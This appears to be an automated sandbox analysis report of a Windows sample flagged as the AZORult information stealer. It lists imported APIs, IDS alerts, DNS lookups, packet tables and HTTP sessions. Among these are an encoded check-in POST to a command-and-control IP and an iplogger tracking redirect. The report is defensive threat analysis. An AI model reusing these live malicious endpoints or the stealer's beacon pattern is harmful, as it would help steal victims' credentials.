                                                                                                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                                                                      Possible Origin

                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      EnglishGreat Britain

                                                                                                                                      Network Behavior

                                                                                                                                      Snort IDS Alerts

                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                      192.168.2.351.15.219.8649709802029465 02/22/23-08:09:18.995725TCP2029465ET TROJAN Win32/AZORult V3.2 Client Checkin M154970980192.168.2.351.15.219.86
                                                                                                                                      192.168.2.351.15.219.8649708802029465 02/22/23-08:09:18.626942TCP2029465ET TROJAN Win32/AZORult V3.2 Client Checkin M154970880192.168.2.351.15.219.86

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Feb 22, 2023 08:08:14.886470079 CET49701443192.168.2.3148.251.234.93
                                                                                                                                      Feb 22, 2023 08:08:14.886518955 CET44349701148.251.234.93192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:14.886605978 CET49701443192.168.2.3148.251.234.93
                                                                                                                                      Feb 22, 2023 08:08:14.895631075 CET49701443192.168.2.3148.251.234.93
                                                                                                                                      Feb 22, 2023 08:08:14.895659924 CET44349701148.251.234.93192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:14.991379023 CET44349701148.251.234.93192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:14.991564989 CET49701443192.168.2.3148.251.234.93
                                                                                                                                      Feb 22, 2023 08:08:14.996295929 CET49701443192.168.2.3148.251.234.93
                                                                                                                                      Feb 22, 2023 08:08:14.996315002 CET44349701148.251.234.93192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:14.996787071 CET44349701148.251.234.93192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.047611952 CET49701443192.168.2.3148.251.234.93
                                                                                                                                      Feb 22, 2023 08:08:15.422856092 CET49701443192.168.2.3148.251.234.93
                                                                                                                                      Feb 22, 2023 08:08:15.422888041 CET44349701148.251.234.93192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.447536945 CET44349701148.251.234.93192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.447624922 CET44349701148.251.234.93192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.447710991 CET49701443192.168.2.3148.251.234.93
                                                                                                                                      Feb 22, 2023 08:08:15.452239990 CET49701443192.168.2.3148.251.234.93
                                                                                                                                      Feb 22, 2023 08:08:15.452239990 CET49701443192.168.2.3148.251.234.93
                                                                                                                                      Feb 22, 2023 08:08:15.452265978 CET44349701148.251.234.93192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.452280045 CET44349701148.251.234.93192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.539074898 CET49702443192.168.2.3148.251.234.83
                                                                                                                                      Feb 22, 2023 08:08:15.539134979 CET44349702148.251.234.83192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.539212942 CET49702443192.168.2.3148.251.234.83
                                                                                                                                      Feb 22, 2023 08:08:15.539814949 CET49702443192.168.2.3148.251.234.83
                                                                                                                                      Feb 22, 2023 08:08:15.539840937 CET44349702148.251.234.83192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.636094093 CET44349702148.251.234.83192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.636173964 CET49702443192.168.2.3148.251.234.83
                                                                                                                                      Feb 22, 2023 08:08:15.654805899 CET49702443192.168.2.3148.251.234.83
                                                                                                                                      Feb 22, 2023 08:08:15.654856920 CET44349702148.251.234.83192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.655298948 CET44349702148.251.234.83192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.665684938 CET49702443192.168.2.3148.251.234.83
                                                                                                                                      Feb 22, 2023 08:08:15.665708065 CET44349702148.251.234.83192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.724589109 CET44349702148.251.234.83192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.724659920 CET44349702148.251.234.83192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.724704027 CET44349702148.251.234.83192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.724792004 CET49702443192.168.2.3148.251.234.83
                                                                                                                                      Feb 22, 2023 08:08:15.724848986 CET44349702148.251.234.83192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.724877119 CET44349702148.251.234.83192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.724900007 CET49702443192.168.2.3148.251.234.83
                                                                                                                                      Feb 22, 2023 08:08:15.724939108 CET44349702148.251.234.83192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.724947929 CET49702443192.168.2.3148.251.234.83
                                                                                                                                      Feb 22, 2023 08:08:15.724997044 CET49702443192.168.2.3148.251.234.83
                                                                                                                                      Feb 22, 2023 08:08:16.469945908 CET49702443192.168.2.3148.251.234.83
                                                                                                                                      Feb 22, 2023 08:08:16.469996929 CET44349702148.251.234.83192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:16.470113039 CET49702443192.168.2.3148.251.234.83
                                                                                                                                      Feb 22, 2023 08:08:16.470135927 CET44349702148.251.234.83192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:31.073242903 CET4970480192.168.2.3142.250.180.147
                                                                                                                                      Feb 22, 2023 08:08:31.094541073 CET8049704142.250.180.147192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:31.094769001 CET4970480192.168.2.3142.250.180.147
                                                                                                                                      Feb 22, 2023 08:08:31.106020927 CET4970480192.168.2.3142.250.180.147
                                                                                                                                      Feb 22, 2023 08:08:31.127276897 CET8049704142.250.180.147192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:31.507232904 CET8049704142.250.180.147192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:31.507365942 CET4970480192.168.2.3142.250.180.147
                                                                                                                                      Feb 22, 2023 08:08:32.490200043 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:32.490276098 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:32.490403891 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:32.508341074 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:32.508380890 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:32.588465929 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:32.588555098 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:32.588574886 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:32.588617086 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:32.878638029 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:32.878699064 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:32.879590034 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:32.879682064 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:32.881680965 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:32.881699085 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:35.885557890 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:35.885732889 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:35.885759115 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:35.885848045 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:35.886305094 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:35.886384964 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:35.886447906 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:35.886518955 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:36.059093952 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:36.059154987 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:40.758264065 CET4970480192.168.2.3142.250.180.147
                                                                                                                                      Feb 22, 2023 08:09:17.032350063 CET4970780192.168.2.3142.250.180.147
                                                                                                                                      Feb 22, 2023 08:09:17.053451061 CET8049707142.250.180.147192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:17.053560972 CET4970780192.168.2.3142.250.180.147
                                                                                                                                      Feb 22, 2023 08:09:17.093458891 CET4970780192.168.2.3142.250.180.147
                                                                                                                                      Feb 22, 2023 08:09:17.114628077 CET8049707142.250.180.147192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:17.252588034 CET8049707142.250.180.147192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:17.252793074 CET4970780192.168.2.3142.250.180.147
                                                                                                                                      Feb 22, 2023 08:09:18.590078115 CET4970880192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.622257948 CET804970851.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:18.622584105 CET4970880192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.626941919 CET4970880192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.655373096 CET804970851.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:18.950828075 CET804970851.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:18.950881004 CET804970851.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:18.950927973 CET4970880192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.950928926 CET4970880192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.951622009 CET4970880192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.967210054 CET4970980192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.983825922 CET804970851.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:18.995446920 CET804970951.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:18.995544910 CET4970980192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.995724916 CET4970980192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:19.025602102 CET804970951.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:19.278256893 CET804970951.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:19.278280020 CET804970951.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:19.278422117 CET4970980192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:19.278491974 CET4970980192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:19.307511091 CET804970951.15.219.86192.168.2.3

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Feb 22, 2023 08:08:14.854444027 CET4997753192.168.2.38.8.8.8
                                                                                                                                      Feb 22, 2023 08:08:14.872344971 CET53499778.8.8.8192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:15.518769979 CET5784053192.168.2.38.8.8.8
                                                                                                                                      Feb 22, 2023 08:08:15.536854982 CET53578408.8.8.8192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:31.021950006 CET5799053192.168.2.38.8.8.8
                                                                                                                                      Feb 22, 2023 08:08:31.065187931 CET53579908.8.8.8192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:32.460294008 CET5238753192.168.2.38.8.8.8
                                                                                                                                      Feb 22, 2023 08:08:32.488538027 CET53523878.8.8.8192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:16.978604078 CET5692453192.168.2.38.8.8.8
                                                                                                                                      Feb 22, 2023 08:09:17.009661913 CET53569248.8.8.8192.168.2.3

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Feb 22, 2023 08:08:14.854444027 CET192.168.2.38.8.8.80x4f45Standard query (0)2no.coA (IP address)IN (0x0001)false
                                                                                                                                      Feb 22, 2023 08:08:15.518769979 CET192.168.2.38.8.8.80xad20Standard query (0)iplogger.orgA (IP address)IN (0x0001)false
                                                                                                                                      Feb 22, 2023 08:08:31.021950006 CET192.168.2.38.8.8.80xccbfStandard query (0)www.chameleon-managers.comA (IP address)IN (0x0001)false
                                                                                                                                      Feb 22, 2023 08:08:32.460294008 CET192.168.2.38.8.8.80x2ef2Standard query (0)neosoft-activator.appspot.comA (IP address)IN (0x0001)false
                                                                                                                                      Feb 22, 2023 08:09:16.978604078 CET192.168.2.38.8.8.80x7400Standard query (0)www.chameleon-managers.comA (IP address)IN (0x0001)false

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Feb 22, 2023 08:08:14.872344971 CET8.8.8.8192.168.2.30x4f45No error (0)2no.co148.251.234.93A (IP address)IN (0x0001)false
                                                                                                                                      Feb 22, 2023 08:08:15.536854982 CET8.8.8.8192.168.2.30xad20No error (0)iplogger.org148.251.234.83A (IP address)IN (0x0001)false
                                                                                                                                      Feb 22, 2023 08:08:31.065187931 CET8.8.8.8192.168.2.30xccbfNo error (0)www.chameleon-managers.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Feb 22, 2023 08:08:31.065187931 CET8.8.8.8192.168.2.30xccbfNo error (0)ghs.googlehosted.com142.250.180.147A (IP address)IN (0x0001)false
                                                                                                                                      Feb 22, 2023 08:08:32.488538027 CET8.8.8.8192.168.2.30x2ef2No error (0)neosoft-activator.appspot.com142.250.184.84A (IP address)IN (0x0001)false
                                                                                                                                      Feb 22, 2023 08:09:17.009661913 CET8.8.8.8192.168.2.30x7400No error (0)www.chameleon-managers.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Feb 22, 2023 08:09:17.009661913 CET8.8.8.8192.168.2.30x7400No error (0)ghs.googlehosted.com142.250.180.147A (IP address)IN (0x0001)false

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • 2no.co
                                                                                                                                      • iplogger.org
                                                                                                                                      • neosoft-activator.appspot.com
                                                                                                                                      • www.chameleon-managers.com
                                                                                                                                      • 51.15.219.86

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      0192.168.2.349701148.251.234.93443C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      1192.168.2.349702148.251.234.83443C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      2192.168.2.349705142.250.184.84443C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      3192.168.2.349704142.250.180.14780C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Feb 22, 2023 08:08:31.106020927 CET227OUTGET /static/?category=install&action=install&label=paid&uid=&prg=explorer HTTP/1.1
                                                                                                                                      User-Agent: Chameleon Static (Ver: 3.0.0.505)
                                                                                                                                      Host: www.chameleon-managers.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Feb 22, 2023 08:08:31.507232904 CET227INHTTP/1.1 200 OK
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Set-Cookie: cham_uid=c59b80ec3e93e3d2a7920d213840ce6b; expires=Thu, 22-Feb-2024 07:08:31 GMT; Path=/
                                                                                                                                      X-Cloud-Trace-Context: eec096664d7793a8ae71fd4f94e9cece;o=1
                                                                                                                                      Date: Wed, 22 Feb 2023 07:08:31 GMT
                                                                                                                                      Server: Google Frontend
                                                                                                                                      Content-Length: 32
                                                                                                                                      Expires: Wed, 22 Feb 2023 07:08:31 GMT
                                                                                                                                      Data Raw: 63 35 39 62 38 30 65 63 33 65 39 33 65 33 64 32 61 37 39 32 30 64 32 31 33 38 34 30 63 65 36 62
                                                                                                                                      Data Ascii: c59b80ec3e93e3d2a7920d213840ce6b


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      4192.168.2.349707142.250.180.14780C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Feb 22, 2023 08:09:17.093458891 CET327OUTGET /info/versions/ HTTP/1.1
                                                                                                                                      User-Agent: Chameleon checker ( Ver: 3.0.0.505)
                                                                                                                                      Host: www.chameleon-managers.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Feb 22, 2023 08:09:17.252588034 CET327INHTTP/1.1 200 OK
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Set-Cookie: cham_uid=0d69d7bfc369811f84d08007faaec7bd; expires=Thu, 22-Feb-2024 07:09:17 GMT; Path=/
                                                                                                                                      X-Cloud-Trace-Context: b90958ac7616a13e32b2ada71c38deaa
                                                                                                                                      Date: Wed, 22 Feb 2023 07:09:17 GMT
                                                                                                                                      Server: Google Frontend
                                                                                                                                      Content-Length: 470
                                                                                                                                      Expires: Wed, 22 Feb 2023 07:09:17 GMT
                                                                                                                                      Data Raw: 3c 3f 0a 24 73 74 61 72 74 75 70 5f 66 75 6c 6c 5f 76 65 72 5f 64 61 64 61 67 6f 6f 3d 22 33 2e 32 2e 30 2e 37 31 32 22 3b 0a 24 73 74 61 72 74 75 70 5f 66 75 6c 6c 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 39 31 34 22 3b 0a 24 73 74 61 72 74 75 70 5f 62 65 74 61 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 39 31 34 22 3b 0a 24 77 69 6e 64 6f 77 5f 66 75 6c 6c 5f 76 65 72 3d 22 32 2e 32 2e 30 2e 34 32 38 22 3b 0a 24 77 69 6e 64 6f 77 5f 62 65 74 61 5f 76 65 72 3d 22 32 2e 32 2e 30 2e 34 32 38 22 3b 0a 24 74 61 73 6b 5f 66 75 6c 6c 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 37 38 32 22 3b 0a 24 74 61 73 6b 5f 62 65 74 61 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 37 38 32 22 3b 0a 24 65 78 70 6c 6f 72 65 72 5f 66 75 6c 6c 5f 76 65 72 3d 22 33 2e 30 2e 30 2e 35 30 30 22 3b 0a 24 65 78 70 6c 6f 72 65 72 5f 62 65 74 61 5f 76 65 72 3d 22 33 2e 30 2e 30 2e 35 30 30 22 3b 0a 24 76 6f 6c 75 6d 65 5f 66 75 6c 6c 5f 76 65 72 3d 22 31 2e 30 2e 30 2e 31 33 32 22 3b 0a 24 76 6f 6c 75 6d 65 5f 62 65 74 61 5f 76 65 72 3d 22 31 2e 30 2e 30 2e 31 33 32 22 3b 0a 24 73 68 75 74 64 6f 77 6e 5f 66 75 6c 6c 5f 76 65 72 3d 22 31 2e 32 2e 32 2e 34 30 22 3b 0a 24 73 68 75 74 64 6f 77 6e 5f 62 65 74 61 5f 76 65 72 3d 22 31 2e 32 2e 32 2e 34 30 22 3b 0a 24 66 6f 6c 64 65 72 5f 66 75 6c 6c 5f 76 65 72 3d 22 32 2e 30 2e 31 30 2e 34 30 30 22 3b 0a 24 66 6f 6c 64 65 72 5f 62 65 74 61 5f 76 65 72 3d 22 32 2e 30 2e 31 30 2e 34 30 30 22 3b 0a 3f 3e
                                                                                                                                      Data Ascii: <?$startup_full_ver_dadagoo="3.2.0.712";$startup_full_ver="4.0.0.914";$startup_beta_ver="4.0.0.914";$window_full_ver="2.2.0.428";$window_beta_ver="2.2.0.428";$task_full_ver="4.0.0.782";$task_beta_ver="4.0.0.782";$explorer_full_ver="3.0.0.500";$explorer_beta_ver="3.0.0.500";$volume_full_ver="1.0.0.132";$volume_beta_ver="1.0.0.132";$shutdown_full_ver="1.2.2.40";$shutdown_beta_ver="1.2.2.40";$folder_full_ver="2.0.10.400";$folder_beta_ver="2.0.10.400";?>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      5192.168.2.34970851.15.219.8680C:\Users\user\AppData\Roaming\update.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Feb 22, 2023 08:09:18.626941919 CET328OUTPOST /1/index.php HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                                                                                      Host: 51.15.219.86
                                                                                                                                      Content-Length: 109
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 3f 2f fb 3e 2f fb 3c 2f fb 3f 2f fb 34 4e 8b 28 38 8c 28 39 ff 28 39 ff 28 39 f8 28 39 fa 28 39 fe 28 39 fd 28 39 f9 4c 2f fb 34
                                                                                                                                      Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/?/>/</?/4N(8(9(9(9(9(9(9(9L/4
                                                                                                                                      Feb 22, 2023 08:09:18.950828075 CET328INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.4.5
                                                                                                                                      Date: Wed, 22 Feb 2023 07:09:18 GMT
                                                                                                                                      Content-Length: 0
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      6192.168.2.34970951.15.219.8680C:\Users\user\AppData\Roaming\update.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Feb 22, 2023 08:09:18.995724916 CET329OUTPOST /1/index.php HTTP/1.0
                                                                                                                                      Host: 51.15.219.86
                                                                                                                                      Connection: close
                                                                                                                                      User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                                                                                      Content-Length: 109
                                                                                                                                      Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 3f 2f fb 3e 2f fb 3c 2f fb 3f 2f fb 34 4e 8b 28 38 8c 28 39 ff 28 39 ff 28 39 f8 28 39 fa 28 39 fe 28 39 fd 28 39 f9 4c 2f fb 34
                                                                                                                                      Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/?/>/</?/4N(8(9(9(9(9(9(9(9L/4
                                                                                                                                      Feb 22, 2023 08:09:19.278256893 CET329INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.4.5
                                                                                                                                      Date: Wed, 22 Feb 2023 07:09:19 GMT
                                                                                                                                      Content-Length: 0
                                                                                                                                      Connection: close


                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      0192.168.2.349701148.251.234.93443C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      2023-02-22 07:08:15 UTC0OUTGET /1dHC37 HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                      Host: 2no.co
                                                                                                                                      2023-02-22 07:08:15 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 22 Feb 2023 07:08:15 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: clhf03028ja=84.17.52.8; expires=Thu, 22-Feb-2024 07:08:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                      Location: https://iplogger.org/unknown/2no.co/1dHC37/unknown
                                                                                                                                      Expires: Wed, 22 Feb 2023 07:08:15 +0000
                                                                                                                                      Strict-Transport-Security: max-age=604800
                                                                                                                                      Content-Security-Policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      2023-02-22 07:08:15 UTC0INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      1192.168.2.349702148.251.234.83443C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      2023-02-22 07:08:15 UTC0OUTGET /unknown/2no.co/1dHC37/unknown HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                      Host: iplogger.org
                                                                                                                                      2023-02-22 07:08:15 UTC0INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 22 Feb 2023 07:08:15 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval' data: blob:; report-uri https://iplogger.org/csp.php;
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                      Last-Modified: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                      Cache-Control: max-age=3, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      Set-Cookie: cursor=CXYw25B9h6R9R490w7b7b6s1jKFUCQdX; path=/; domain=.iplogger.org; secure; HttpOnly; SameSite=Lax
